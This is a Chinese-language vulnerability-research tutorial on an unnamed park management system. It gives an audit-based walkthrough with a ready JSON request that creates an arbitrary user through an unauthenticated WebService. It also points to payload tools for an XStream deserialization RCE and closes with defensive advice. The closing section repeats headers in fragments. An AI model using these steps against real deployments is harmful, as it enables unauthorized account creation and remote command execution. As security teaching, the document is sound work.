漏洞挖掘之某园区系统安全分析教学文档<\/h1>

0x00 前言<\/h2>
本文档详细分析某园区系统中发现的多个安全漏洞，包括任意用户登录漏洞和XStream反序列化漏洞。通过本教学文档，您将学习到如何通过代码审计发现这些漏洞，以及如何构造利用这些漏洞。<\/p>

0x01 任意用户登录漏洞分析<\/h2>

1. 漏洞发现路径<\/h3>

通过搜索

new UserBean()<\/code>代码模式，发现addUser<\/code>方法：<\/li>
<\/ol>
public<\/span> void<\/span> addUser<\/span>(<\/span>WsAdminParam<<\/span>ExUserBean><\/span> adminParam)<\/span> {<\/span>
<\/span><\/span>    ExUserBean bean =<\/span> (<\/span>ExUserBean)<\/span>adminParam.<\/span>getParam<\/span>();<\/span>
<\/span><\/span>    UserBean userBean =<\/span> new<\/span> UserBean();<\/span>
<\/span><\/span>    userBean.<\/span>setOwnerCode<\/span>(<\/span>bean.<\/span>getOrgCode<\/span>());<\/span>
<\/span><\/span>    userBean.<\/span>setRoleIds<\/span>(<\/span>bean.<\/span>getRoleIds<\/span>());<\/span>
<\/span><\/span>    userBean.<\/span>setLoginName<\/span>(<\/span>bean.<\/span>getLoginName<\/span>());<\/span>
<\/span><\/span>    userBean.<\/span>setIsReuse<\/span>(<\/span>bean.<\/span>getIsReuse<\/span>()<\/span> ?<\/span> 1<\/span> :<\/span> 0<\/span>);<\/span>
<\/span><\/span>    userBean.<\/span>setLoginPass<\/span>(<\/span>bean.<\/span>getLoginPass<\/span>());<\/span>
<\/span><\/span>    userBean.<\/span>setUserName<\/span>(<\/span>bean.<\/span>getUserName<\/span>());<\/span>
<\/span><\/span>    userBean.<\/span>setUserType<\/span>(<\/span>0<\/span>);<\/span>
<\/span><\/span>    this<\/span>.<\/span>userManager<\/span>.<\/span>addUser<\/span>(<\/span>userBean);<\/span>
<\/span><\/span>    UserCache.<\/span>addUserToUserList<\/span>(<\/span>userBean);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
查找调用链：<\/li>
<\/ol>

发现ExUserManager<\/code>接口中的方法被映射到AdminWebServiceImpl<\/code>的interfaceMethodsMap<\/code>中：<\/li>
<\/ul>
interfaceMethodsMap.<\/span>put<\/span>(<\/span>AdminWebService.<\/span>INTERFACE_ADD_USER<\/span>,<\/span> 
<\/span><\/span>    WsMethod.<\/span>bulid<\/span>(<\/span>ExUserManager.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"addUser"<\/span>,<\/span> WsAdminParam.<\/span>class<\/span>),<\/span> ExUserBean.<\/span>class<\/span>));<\/span>
<\/span><\/span><\/code><\/pre>
WebService暴露：<\/li>
<\/ol>

AdminWebServiceImpl<\/code>类使用@WebService<\/code>注解暴露服务<\/li>
未配置适当的安全拦截器，导致未授权访问<\/li>
<\/ul>
2. 漏洞利用方法<\/h3>

构造合法的JSON参数：<\/li>
<\/ol>
{
<\/span><\/span> "authorinize"<\/span>: {
<\/span><\/span>   "userName"<\/span>: "11"<\/span>,
<\/span><\/span>   "password"<\/span>: "11"<\/span>,
<\/span><\/span>   "loginCode"<\/span>: "11"<\/span>
<\/span><\/span> },
<\/span><\/span> "locale"<\/span>: "1"<\/span>,
<\/span><\/span> "param"<\/span>: {
<\/span><\/span>   "orgCode"<\/span>:"001"<\/span>,
<\/span><\/span>   "loginName"<\/span>:"test"<\/span>,
<\/span><\/span>   "roleIds"<\/span>:"1"<\/span>,
<\/span><\/span>   "loginPass"<\/span>:"test"<\/span>,
<\/span><\/span>   "isReuse"<\/span>:0<\/span>,
<\/span><\/span>   "oldLoginName"<\/span>:"xxx"<\/span>,
<\/span><\/span>   "oldRoleIds"<\/span>:"1"<\/span>,
<\/span><\/span>   "userName"<\/span>:"test"<\/span>
<\/span><\/span> },
<\/span><\/span> "paramStr"<\/span>: "11"<\/span>,
<\/span><\/span> "langLocale"<\/span>: "11"<\/span>,
<\/span><\/span> "orders"<\/span>: [{"propertyName"<\/span>: "1"<\/span>,"isAscending"<\/span>: true<\/span>}]
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
使用Burp Suite的WSDler插件：<\/li>
<\/ol>

访问WebService的WSDL描述文件<\/li>
使用插件解析WSDL并生成请求模板<\/li>
将构造的JSON参数填入请求中<\/li>
<\/ul>

成功创建用户后，使用该凭证登录系统<\/li>
<\/ol>
3. 其他相关接口<\/h3>

queryUser<\/code> - 查看用户信息<\/li>
viewUser<\/code> - 查看用户密码（敏感信息泄露）<\/li>
deleteUsers<\/code> - 删除用户<\/li>
updateUser<\/code> - 更新用户信息<\/li>
updateUserPassword<\/code> - 修改用户密码<\/li>
<\/ol>
0x02 XStream反序列化漏洞分析<\/h2>
1. 漏洞发现<\/h3>

发现项目中使用了低版本的XStream依赖<\/li>
使用jar-analyzer工具查找项目中调用fromXML<\/code>和toXML<\/code>方法的位置<\/li>
定位到addDevs<\/code>方法：<\/li>
<\/ol>
public<\/span> void<\/span> addDevs<\/span>(<\/span>WsAdminParam<<\/span>String><\/span> adminParam)<\/span> {<\/span>
<\/span><\/span>    String xmlInfo =<\/span> adminParam.<\/span>getParam<\/span>();<\/span>
<\/span><\/span>    XStream xStream =<\/span> this<\/span>.<\/span>getFormatedDevXStream<\/span>();<\/span>
<\/span><\/span>    XmlInfo info =<\/span> this<\/span>.<\/span>validateAndReturnXmlInfo<\/span>(<\/span>xmlInfo);<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. 漏洞利用<\/h3>

构造恶意XML payload：<\/li>
<\/ol>

使用woodpecker插件生成XStream Payload<\/li>
工具地址：

框架：https:\/\/github.com\/woodpecker-framework\/woodpecker-framework-release<\/li>
插件：https:\/\/github.com\/woodpecker-appstore\/xstream-vuldb<\/li>
<\/ul>
<\/li>
<\/ul>


将payload进行URL全编码后作为xmlInfo<\/code>参数传递<\/p>
<\/li>

成功执行系统命令（如ping命令）<\/p>
<\/li>
<\/ol>
0x03 防御建议<\/h2>

对于任意用户登录漏洞：<\/li>
<\/ol>

添加适当的权限验证机制<\/li>
对WebService接口配置认证拦截器<\/li>
限制用户创建权限<\/li>
<\/ul>

对于XStream反序列化漏洞：<\/li>
<\/ol>

升级XStream到最新版本<\/li>
配置XStream的安全框架，限制可反序列化的类<\/li>
对输入进行严格验证<\/li>
<\/ul>

通用安全建议：<\/li>
<\/ol>

定期进行代码审计和安全测试<\/li>
最小化暴露的接口数量<\/li>
实施输入验证和输出编码<\/li>
<\/ul>
0x04 工具推荐<\/h2>

代码搜索工具：用于查找特定代码模式（如new UserBean()<\/code>）<\/li>
Burp Suite WSDler插件：用于解析和构造WebService请求<\/li>
jar-analyzer：用于分析Java项目中特定方法的调用<\/li>
woodpecker框架：用于生成XStream反序列化payload<\/li>
<\/ol>
0x05 总结<\/h2>
本教学文档详细分析了某园区系统中的两个高危漏洞：任意用户登录和XStream反序列化。通过代码审计和工具辅助，安全研究人员可以有效地发现和验证这类漏洞。开发人员应重视此类安全问题，实施适当的安全措施来保护系统。<\/p>

漏洞挖掘之某园区系统安全分析教学文档<\/h1>

0x00 前言<\/h2> 本文档详细分析某园区系统中发现的多个安全漏洞，包括任意用户登录漏洞和XStream反序列化漏洞。通过本教学文档，您将学习到如何通过代码审计发现这些漏洞，以及如何构造利用这些漏洞。<\/p>

0x01 任意用户登录漏洞分析<\/h2>

0x02 XStream反序列化漏洞分析<\/h2>

0x00 前言<\/h2>
本文档详细分析某园区系统中发现的多个安全漏洞，包括任意用户登录漏洞和XStream反序列化漏洞。通过本教学文档，您将学习到如何通过代码审计发现这些漏洞，以及如何构造利用这些漏洞。<\/p>